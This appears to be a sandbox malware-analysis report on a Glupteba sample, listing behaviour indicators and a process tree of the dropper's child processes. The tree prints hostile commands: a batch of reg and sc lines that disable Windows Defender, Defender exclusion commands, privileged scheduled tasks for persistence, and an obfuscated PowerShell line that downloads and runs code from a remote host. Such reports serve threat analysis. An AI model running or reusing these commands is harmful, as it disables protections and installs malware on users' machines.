glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	72k5LEDsMsYjsptSJm_DD9kJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	72k5LEDsMsYjsptSJm_DD9kJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ySEdxtSvRnggSdtdR3bDeb0H.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ySEdxtSvRnggSdtdR3bDeb0H.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	N7aKzirTYqxmywowwYCRgxOQ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	N7aKzirTYqxmywowwYCRgxOQ.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Setup (18).exe

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral10/files/0x000100000001abb2-152.dat	themida
behavioral10/files/0x000100000001abaf-146.dat	themida
behavioral10/files/0x000100000001abb2-187.dat	themida
behavioral10/files/0x000100000001abaf-182.dat	themida
behavioral10/files/0x000100000001aba8-171.dat	themida
behavioral10/files/0x000100000001aba8-202.dat	themida
behavioral10/memory/3212-264-0x00000000008C0000-0x00000000008C1000-memory.dmp	themida
behavioral10/memory/2152-267-0x0000000000C90000-0x0000000000C91000-memory.dmp	themida
behavioral10/memory/2544-288-0x0000000000180000-0x0000000000181000-memory.dmp	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ySEdxtSvRnggSdtdR3bDeb0H.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	72k5LEDsMsYjsptSJm_DD9kJ.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	N7aKzirTYqxmywowwYCRgxOQ.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1660	geoiptool.com
29	ipinfo.io
30	ipinfo.io
33	api.db-ip.com
34	api.db-ip.com
133	ipinfo.io
134	ipinfo.io
148	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
2152	72k5LEDsMsYjsptSJm_DD9kJ.exe
3212	ySEdxtSvRnggSdtdR3bDeb0H.exe
2544	N7aKzirTYqxmywowwYCRgxOQ.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 2328 set thread context of 4848	2328	ToWhA1e4ZMLm7LVI4Q19kAnx.exe	123
PID 3612 set thread context of 4856	3612	payZSMEtryi_KTquJ7dRMVqq.exe	122
PID 4536 set thread context of 4492	4536	Ou3tPfureT.exe	132
PID 3736 set thread context of 2092	3736	XrUXKDXoEhQzOQ9R4wGK2LY9.exe	131
PID 2328 set thread context of 4268	2328	ToWhA1e4ZMLm7LVI4Q19kAnx.exe	134
PID 756 set thread context of 3900	756	5BB88lfXVhc7fn9HwGPubJrb.exe	152
PID 3736 set thread context of 5100	3736	XrUXKDXoEhQzOQ9R4wGK2LY9.exe	138
PID 2328 set thread context of 2864	2328	ToWhA1e4ZMLm7LVI4Q19kAnx.exe	141

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	OoP4s0TqtCc8kDGf_f6UxgGS.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	OoP4s0TqtCc8kDGf_f6UxgGS.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	K8cHCGPPWdwA2s0ojEWsRlFW.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	K8cHCGPPWdwA2s0ojEWsRlFW.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	OoP4s0TqtCc8kDGf_f6UxgGS.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	OoP4s0TqtCc8kDGf_f6UxgGS.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst1.exe	OoP4s0TqtCc8kDGf_f6UxgGS.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 9 IoCs

pid	pid_target	Process	procid_target
3916	1488	WerFault.exe	84
2612	3908	WerFault.exe	101
4864	1488	WerFault.exe	84
4252	4536	WerFault.exe	117
3552	1488	WerFault.exe	84
5708	1488	WerFault.exe	84
5832	1912	WerFault.exe	156
6568	1488	WerFault.exe	84
6584	6756	WerFault.exe	240

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5BB88lfXVhc7fn9HwGPubJrb.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5BB88lfXVhc7fn9HwGPubJrb.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5BB88lfXVhc7fn9HwGPubJrb.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5108	schtasks.exe
5076	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
15280	timeout.exe
8204	timeout.exe

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
17188	vssadmin.exe
35980	Process not Found

Kills process with taskkill 3 IoCs

evasion

pid	Process
6180	taskkill.exe
7372	taskkill.exe
5864	taskkill.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	139	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3980	Setup (18).exe
3980	Setup (18).exe
3900	5BB88lfXVhc7fn9HwGPubJrb.exe
3900	5BB88lfXVhc7fn9HwGPubJrb.exe
1784	AdvancedRun.exe
1784	AdvancedRun.exe
1784	AdvancedRun.exe
1784	AdvancedRun.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
3916	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
4252	WerFault.exe
2612	WerFault.exe
2612	WerFault.exe
2612	WerFault.exe
2612	WerFault.exe
2612	WerFault.exe
2612	WerFault.exe
2612	WerFault.exe
2612	WerFault.exe
2612	WerFault.exe
2612	WerFault.exe
2612	WerFault.exe
2612	WerFault.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	496	_G4rLDF19KZ5ZhGv7ZdSIDyo.exe
Token: SeRestorePrivilege	3916	WerFault.exe
Token: SeBackupPrivilege	3916	WerFault.exe
Token: SeDebugPrivilege	1784	AdvancedRun.exe
Token: SeImpersonatePrivilege	1784	AdvancedRun.exe
Token: SeDebugPrivilege	3916	WerFault.exe
Token: SeDebugPrivilege	4252	WerFault.exe
Token: SeDebugPrivilege	2612	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3980 wrote to memory of 1488	3980	Setup (18).exe	84
PID 3980 wrote to memory of 1488	3980	Setup (18).exe	84
PID 3980 wrote to memory of 1488	3980	Setup (18).exe	84
PID 3980 wrote to memory of 1048	3980	Setup (18).exe	86
PID 3980 wrote to memory of 1048	3980	Setup (18).exe	86
PID 3980 wrote to memory of 1048	3980	Setup (18).exe	86
PID 3980 wrote to memory of 1308	3980	Setup (18).exe	83
PID 3980 wrote to memory of 1308	3980	Setup (18).exe	83
PID 3980 wrote to memory of 1308	3980	Setup (18).exe	83
PID 3980 wrote to memory of 1088	3980	Setup (18).exe	85
PID 3980 wrote to memory of 1088	3980	Setup (18).exe	85
PID 3980 wrote to memory of 1088	3980	Setup (18).exe	85
PID 3980 wrote to memory of 3880	3980	Setup (18).exe	82
PID 3980 wrote to memory of 3880	3980	Setup (18).exe	82
PID 3980 wrote to memory of 3120	3980	Setup (18).exe	87
PID 3980 wrote to memory of 3120	3980	Setup (18).exe	87
PID 3980 wrote to memory of 3120	3980	Setup (18).exe	87
PID 3980 wrote to memory of 792	3980	Setup (18).exe	81
PID 3980 wrote to memory of 792	3980	Setup (18).exe	81
PID 3980 wrote to memory of 792	3980	Setup (18).exe	81
PID 3980 wrote to memory of 2364	3980	Setup (18).exe	80
PID 3980 wrote to memory of 2364	3980	Setup (18).exe	80
PID 3980 wrote to memory of 2364	3980	Setup (18).exe	80
PID 3980 wrote to memory of 2544	3980	Setup (18).exe	79
PID 3980 wrote to memory of 2544	3980	Setup (18).exe	79
PID 3980 wrote to memory of 2544	3980	Setup (18).exe	79
PID 3980 wrote to memory of 2584	3980	Setup (18).exe	88
PID 3980 wrote to memory of 2584	3980	Setup (18).exe	88
PID 3980 wrote to memory of 2620	3980	Setup (18).exe	89
PID 3980 wrote to memory of 2620	3980	Setup (18).exe	89
PID 3980 wrote to memory of 2620	3980	Setup (18).exe	89
PID 3980 wrote to memory of 2152	3980	Setup (18).exe	98
PID 3980 wrote to memory of 2152	3980	Setup (18).exe	98
PID 3980 wrote to memory of 2152	3980	Setup (18).exe	98
PID 3980 wrote to memory of 2756	3980	Setup (18).exe	95
PID 3980 wrote to memory of 2756	3980	Setup (18).exe	95
PID 3980 wrote to memory of 2756	3980	Setup (18).exe	95
PID 3980 wrote to memory of 2196	3980	Setup (18).exe	96
PID 3980 wrote to memory of 2196	3980	Setup (18).exe	96
PID 3980 wrote to memory of 2196	3980	Setup (18).exe	96
PID 3980 wrote to memory of 2096	3980	Setup (18).exe	94
PID 3980 wrote to memory of 2096	3980	Setup (18).exe	94
PID 3980 wrote to memory of 2096	3980	Setup (18).exe	94
PID 3980 wrote to memory of 2328	3980	Setup (18).exe	93
PID 3980 wrote to memory of 2328	3980	Setup (18).exe	93
PID 3980 wrote to memory of 2328	3980	Setup (18).exe	93
PID 3980 wrote to memory of 2512	3980	Setup (18).exe	90
PID 3980 wrote to memory of 2512	3980	Setup (18).exe	90
PID 3980 wrote to memory of 2512	3980	Setup (18).exe	90
PID 3980 wrote to memory of 4020	3980	Setup (18).exe	99
PID 3980 wrote to memory of 4020	3980	Setup (18).exe	99
PID 3980 wrote to memory of 4020	3980	Setup (18).exe	99
PID 3980 wrote to memory of 3612	3980	Setup (18).exe	106
PID 3980 wrote to memory of 3612	3980	Setup (18).exe	106
PID 3980 wrote to memory of 3612	3980	Setup (18).exe	106
PID 3980 wrote to memory of 3212	3980	Setup (18).exe	104
PID 3980 wrote to memory of 3212	3980	Setup (18).exe	104
PID 3980 wrote to memory of 3212	3980	Setup (18).exe	104
PID 3980 wrote to memory of 2076	3980	Setup (18).exe	102
PID 3980 wrote to memory of 2076	3980	Setup (18).exe	102
PID 3980 wrote to memory of 2076	3980	Setup (18).exe	102
PID 3980 wrote to memory of 3908	3980	Setup (18).exe	101
PID 3980 wrote to memory of 3908	3980	Setup (18).exe	101
PID 3980 wrote to memory of 3908	3980	Setup (18).exe	101

C:\Users\Admin\AppData\Local\Temp\Setup (18).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (18).exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3980
- C:\Users\Admin\Documents\N7aKzirTYqxmywowwYCRgxOQ.exe
  "C:\Users\Admin\Documents\N7aKzirTYqxmywowwYCRgxOQ.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2544
- C:\Users\Admin\Documents\20yg0VAfbLsR9xemJziz5cqC.exe
  "C:\Users\Admin\Documents\20yg0VAfbLsR9xemJziz5cqC.exe"
  2⤵
  - Executes dropped EXE
  PID:2364
- C:\Users\Admin\Documents\cGPemfFV0RfSMrVzrKwzawTQ.exe
  "C:\Users\Admin\Documents\cGPemfFV0RfSMrVzrKwzawTQ.exe"
  2⤵
  - Executes dropped EXE
  PID:792
- C:\Users\Admin\Documents\rW7UJxhvekSSkLuwjBdzXFdu.exe
  "C:\Users\Admin\Documents\rW7UJxhvekSSkLuwjBdzXFdu.exe"
  2⤵
  - Executes dropped EXE
  PID:3880
- - C:\Users\Admin\AppData\Local\Temp\L0z1VeAe.com
    "C:\Users\Admin\AppData\Local\Temp\L0z1VeAe.com"
    3⤵
    PID:2160
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EF9C.tmp\EFAC.tmp\EFAD.bat C:\Users\Admin\AppData\Local\Temp\L0z1VeAe.com"
      4⤵
      PID:5368
    - - C:\Windows\system32\sc.exe
        
        sc config WinDefend start=disabled
        5⤵
        
        PID:2172
    - - C:\Windows\system32\sc.exe
        
        sc config SecurityHealthService start=disabled
        5⤵
        
        PID:5292
    - - C:\Windows\system32\sc.exe
        
        sc config Sense start=disabled
        5⤵
        
        PID:4640
    - - C:\Windows\system32\sc.exe
        
        sc config WdNisDrv start=disabled
        5⤵
        
        PID:5236
    - - C:\Windows\system32\sc.exe
        
        sc config WdNisSvc start=disabled
        5⤵
        
        PID:4924
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        5⤵
        
        PID:6184
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6476
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:7104
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6160
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:6256
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:7640
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:7516
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:8120
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6724
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:4120
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:7408
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:7920
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:8512
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:9156
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:8700
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        5⤵
        
        PID:6176
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"
        5⤵
        
        PID:9072
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"
        6⤵
        
        PID:9000
      - C:\Windows\system32\find.exe
        
        find /i "SecHealthUI"
        6⤵
        
        PID:8580
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
        5⤵
        
        PID:7976
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-3686645723-710336880-414668232-1000\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
        5⤵
        
        PID:9356
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
        5⤵
        
        PID:10068
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
        6⤵
        
        PID:9516
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f
        5⤵
        
        PID:7276
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:9296
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:11088
- - C:\Users\Admin\AppData\Local\Temp\s0bCnQBm.com
    "C:\Users\Admin\AppData\Local\Temp\s0bCnQBm.com"
    3⤵
    PID:4280
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt
      4⤵
      PID:4508
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
        5⤵
        
        PID:6220
- - C:\Users\Admin\AppData\Local\Temp\ObblEKCM.com
    "C:\Users\Admin\AppData\Local\Temp\ObblEKCM.com"
    3⤵
    PID:1420
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt
      4⤵
      PID:5432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
        5⤵
        
        PID:6616
- C:\Users\Admin\Documents\lr6w0wsMgSXlJ0R16_LqkNMD.exe
  "C:\Users\Admin\Documents\lr6w0wsMgSXlJ0R16_LqkNMD.exe"
  2⤵
  - Executes dropped EXE
  PID:1308
- - C:\Users\Admin\AppData\Local\Temp\3fe2e2da-a906-436c-b379-365830e2dd19\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\3fe2e2da-a906-436c-b379-365830e2dd19\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\3fe2e2da-a906-436c-b379-365830e2dd19\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1784
  - - C:\Users\Admin\AppData\Local\Temp\3fe2e2da-a906-436c-b379-365830e2dd19\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\3fe2e2da-a906-436c-b379-365830e2dd19\AdvancedRun.exe" /SpecialRun 4101d8 1784
      4⤵
      PID:4204
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\lr6w0wsMgSXlJ0R16_LqkNMD.exe" -Force
    3⤵
    PID:5192
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\lr6w0wsMgSXlJ0R16_LqkNMD.exe" -Force
    3⤵
    PID:5296
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    3⤵
    PID:5496
- C:\Users\Admin\Documents\4uvmpaZWGBT8ufs_dY7Q8Yxx.exe
  "C:\Users\Admin\Documents\4uvmpaZWGBT8ufs_dY7Q8Yxx.exe"
  2⤵
  - Executes dropped EXE
  PID:1488
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 664
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3916
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 680
    3⤵
    - Program crash
    PID:4864
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 688
    3⤵
    - Program crash
    PID:3552
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 680
    3⤵
    - Program crash
    PID:5708
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 1080
    3⤵
    - Program crash
    PID:6568
- C:\Users\Admin\Documents\BrbM1aSvCQsPnxOjT2ZhpMsa.exe
  "C:\Users\Admin\Documents\BrbM1aSvCQsPnxOjT2ZhpMsa.exe"
  2⤵
  - Executes dropped EXE
  PID:1088
- - C:\Users\Admin\Documents\BrbM1aSvCQsPnxOjT2ZhpMsa.exe
    "C:\Users\Admin\Documents\BrbM1aSvCQsPnxOjT2ZhpMsa.exe"
    3⤵
    PID:5944
- C:\Users\Admin\Documents\00oYGE4G4yzGNywm1BQIWvUf.exe
  "C:\Users\Admin\Documents\00oYGE4G4yzGNywm1BQIWvUf.exe"
  2⤵
  - Executes dropped EXE
  PID:1048
- - C:\Users\Admin\Documents\00oYGE4G4yzGNywm1BQIWvUf.exe
    "C:\Users\Admin\Documents\00oYGE4G4yzGNywm1BQIWvUf.exe"
    3⤵
    PID:5932
- C:\Users\Admin\Documents\giLnZlgj774G4Xjw8yxKyTeI.exe
  "C:\Users\Admin\Documents\giLnZlgj774G4Xjw8yxKyTeI.exe"
  2⤵
  - Executes dropped EXE
  PID:3120
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im giLnZlgj774G4Xjw8yxKyTeI.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\giLnZlgj774G4Xjw8yxKyTeI.exe" & del C:\ProgramData\*.dll & exit
    3⤵
    PID:8112
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im giLnZlgj774G4Xjw8yxKyTeI.exe /f
      4⤵
      Kills process with taskkill
      PID:7372
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:8204
- C:\Users\Admin\Documents\Ej5GKpIk9LGJ_MyAguo_MZMw.exe
  "C:\Users\Admin\Documents\Ej5GKpIk9LGJ_MyAguo_MZMw.exe"
  2⤵
  - Executes dropped EXE
  PID:2584
- C:\Users\Admin\Documents\80WnNzmvOM0v2MbNDg0oY8W3.exe
  "C:\Users\Admin\Documents\80WnNzmvOM0v2MbNDg0oY8W3.exe"
  2⤵
  - Executes dropped EXE
  PID:2620
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "80WnNzmvOM0v2MbNDg0oY8W3.exe" /f & erase "C:\Users\Admin\Documents\80WnNzmvOM0v2MbNDg0oY8W3.exe" & exit
    3⤵
    PID:6776
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "80WnNzmvOM0v2MbNDg0oY8W3.exe" /f
      4⤵
      Kills process with taskkill
      PID:6180
- C:\Users\Admin\Documents\K8cHCGPPWdwA2s0ojEWsRlFW.exe
  "C:\Users\Admin\Documents\K8cHCGPPWdwA2s0ojEWsRlFW.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2512
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5108
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5076
- C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
  "C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2328
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    - Executes dropped EXE
    PID:4848
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    - Executes dropped EXE
    PID:4072
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    - Executes dropped EXE
    PID:4268
